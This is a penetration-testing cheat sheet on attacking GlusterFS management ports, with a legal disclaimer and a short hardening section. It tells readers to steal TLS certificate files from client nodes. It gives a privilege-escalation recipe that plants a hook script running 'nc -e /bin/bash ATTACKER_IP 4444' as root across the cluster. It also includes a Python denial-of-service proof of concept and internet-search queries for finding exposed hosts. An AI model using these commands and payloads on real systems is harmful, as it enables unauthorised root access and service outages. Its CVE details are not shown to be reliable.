---
title: "24007 - Glusterfs"
weight: 24007-24008-24009-49152
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

💡 **Study note**: This document introduces penetration-testing methods for **24007-24008-24009-49152 - GlusterFS**, as a reference for information-security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorised testing only. Unauthorised testing of systems may violate laws and regulations.

---

### Information Gathering

Install the client utilities on your attacking box:

```bash
sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
```

1. **Peer discovery & health**

```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```

2. **Volume reconnaissance**

```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```

3. **Mount without privileges**

```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```

If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side. Common issues are:

* TLS enforcement (`option transport.socket.ssl on`)
* Address based access control (`option auth.allow <cidr>`)

#### Certificate troubleshooting

Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log):

```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```

---

### Known Vulnerabilities (2022-2025)

| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **denial of service** and probable remote code execution. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. |

> Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades.

#### Exploiting `gluster_shared_storage` (privilege escalation)

Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run as **root** on every node.

```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```

If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version.

#### Denial-of-Service PoC (CVE-2023-26253)

```python
#!/usr/bin/env python3
## Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
    s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
    s.send(p.get_buffer())
```
Running the script crashes `glusterfsd` < 11.0.

---

### Hardening & Detection

* **Upgrade** – current LTS is 11.1 (July 2025). All CVEs above are fixed.
* Enable **TLS** for every brick:

  ```bash
  gluster volume set <vol> transport.socket.ssl on
  gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
  ```
* Restrict clients with CIDR lists:

  ```bash
  gluster volume set <vol> auth.allow 10.0.0.0/24
  ```
* Expose management port 24007 only on a **private VLAN** or through SSH tunnels.
* Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and enable the **audit-log** feature (`volume set <vol> features.audit-log on`).
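To make the checklist above repeatable, here is an added example (not part of the original page or of the GlusterFS project) that parses `gluster volume info all` output and flags volumes without TLS, with a wildcard `auth.allow`, or with `gluster_shared_storage` exposed. It runs on a constructed sample of the command's output and treats `server.ssl`/`client.ssl` (the documented per-volume keys) as equivalent to the `transport.socket.ssl` key used above.

```python
#!/usr/bin/env python3
# Added example (not from the original page): audit `gluster volume info all`
# output for the weaknesses listed above: TLS off, wildcard auth.allow, and an
# anonymously mountable gluster_shared_storage volume. SAMPLE is constructed.
import re

SAMPLE = """\
Volume Name: data
Options Reconfigured:
server.ssl: on
client.ssl: on
auth.allow: 10.0.0.0/24

Volume Name: gluster_shared_storage
Options Reconfigured:
auth.allow: *
"""
# transport.socket.ssl is the key used above; server.ssl/client.ssl are the
# documented per-volume keys. Any of them being "on" counts as TLS enforced.
SSL_KEYS = ("transport.socket.ssl", "server.ssl", "client.ssl")

def parse_volume_info(text):
    """Return {volume_name: {key: value}} parsed from `volume info` output."""
    volumes, current = {}, None
    for line in text.splitlines():
        m = re.match(r"Volume Name:\s*(\S+)", line)
        if m:
            current = m.group(1)
            volumes[current] = {}
        elif current and ": " in line:  # "Options Reconfigured:" carries no value
            key, value = line.split(": ", 1)
            volumes[current][key.strip()] = value.strip()
    return volumes

def audit(volumes):
    """Return (volume, finding) pairs; auth.allow is '*' (everyone) when unset."""
    findings = []
    for name, opts in volumes.items():
        allow = opts.get("auth.allow", "*")
        if not any(opts.get(k) == "on" for k in SSL_KEYS):
            findings.append((name, "TLS not enforced on this volume"))
        if allow == "*":
            findings.append((name, "auth.allow is '*': any client can mount"))
        if name == "gluster_shared_storage" and allow == "*":
            findings.append((name, "admin volume mountable anonymously (hook dropper risk)"))
    return findings

if __name__ == "__main__":
    for vol, msg in audit(parse_volume_info(SAMPLE)):
        print(f"[!] {vol}: {msg}")
```

On a live cluster, pipe the real `gluster volume info all` output into `parse_volume_info` instead of `SAMPLE`.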

---

### Search Engine Queries

#### FOFA

```bash
# FOFA search syntax
port="24007"
```

#### Shodan

```bash
# Shodan search syntax
port:24007
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:24007
```

---

## 📖 References

- [HackTricks - 24007-glusterfs](https://book.hacktricks.wiki/en/network-services-pentesting/24007-glusterfs.html)

